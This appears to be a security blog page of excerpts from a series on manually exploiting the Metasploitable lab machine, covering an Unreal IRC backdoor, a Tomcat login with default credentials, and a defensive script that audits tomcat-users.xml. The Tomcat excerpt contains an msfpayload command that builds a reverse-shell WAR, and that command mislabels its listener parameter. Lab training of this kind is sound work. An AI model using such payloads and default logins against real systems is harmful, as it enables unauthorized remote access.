Metasploitable without Metasploit – Unreal IRC

 

In continuing our series on compromising the Metasploitable machines, the next installment is on the Unreal IRC service.

This is a very quick exploit, which does not require any additional scripting or even downloading to get to work properly. It's a backdoor within the Unreal IRC daemon that allows a remote attacker to instantly gain root on the target machine. In fact, this method is actually faster than using Metasploit!

So first things first, nmap scan the machine to ensure that the service is running on the target.

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Let's start with an Nmap scan…

So we can see that Tomcat is running on port 8180… Let's take a look at it…

As we can see, the Tomcat manager requires a login. I know that by default the username and password are both ‘tomcat’, so let's try that.

We have logged into the manager application! Let's now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war
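
From the defender's side, the default ‘tomcat’ login used above is something you can find in your own configuration before anyone else does. The following is an added example, not code from the original post: it audits the contents of a tomcat-users.xml file for manager or admin accounts whose password is empty, equal to the username, or on a short list of common defaults. The sample XML, the password list and the function name are constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample of conf/tomcat-users.xml (not taken from any real host).
SAMPLE_USERS_XML = """<tomcat-users>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="deploy" password="Xk3!vq9#Lm2pRt7z" roles="manager-script"/>
  <user username="nopass" password="" roles="manager-gui"/>
  <user username="ops" password="admin" roles="admin-gui"/>
  <user username="role1" password="tomcat" roles="role1"/>
</tomcat-users>"""

# Roles that grant access to the manager/admin applications across Tomcat versions.
PRIVILEGED_ROLES = {"manager", "admin", "manager-gui", "manager-script",
                    "manager-jmx", "manager-status", "admin-gui", "admin-script"}
# Assumed short list of common default passwords; extend it for your environment.
KNOWN_DEFAULTS = {"tomcat", "admin", "manager", "password"}

def audit_tomcat_users(xml_text):
    """Return (username, reason) pairs for privileged accounts with weak passwords."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        # Newer tomcat-users.xml files declare an XML namespace; strip it from the tag.
        if elem.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if not roles & PRIVILEGED_ROLES:
            continue  # weak password, but no access to manager/admin apps
        if not password:
            findings.append((name, "empty password"))
        elif password.lower() == name.lower():
            findings.append((name, "password equals username"))
        elif password.lower() in KNOWN_DEFAULTS:
            findings.append((name, "well-known default password"))
    return findings

if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_USERS_XML):
        print(f"{user}: {reason}")
```

To audit a real installation, pass the text of its conf/tomcat-users.xml to audit_tomcat_users instead of the sample.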

New Video Series

We are excited to announce we have started production on our first video series, “Metasploitable without Metasploit”! The focus of this video series is to teach the up-and-coming InfoSec student how to manually exploit Metasploitable. This is going to help you get a much better understanding of why these exploits work, and what makes them tick.

Don’t get us wrong, we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way. This video series was inspired by taking the OSCP course, which has very strict guidelines for when and what you can do with Metasploit.

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members' employers.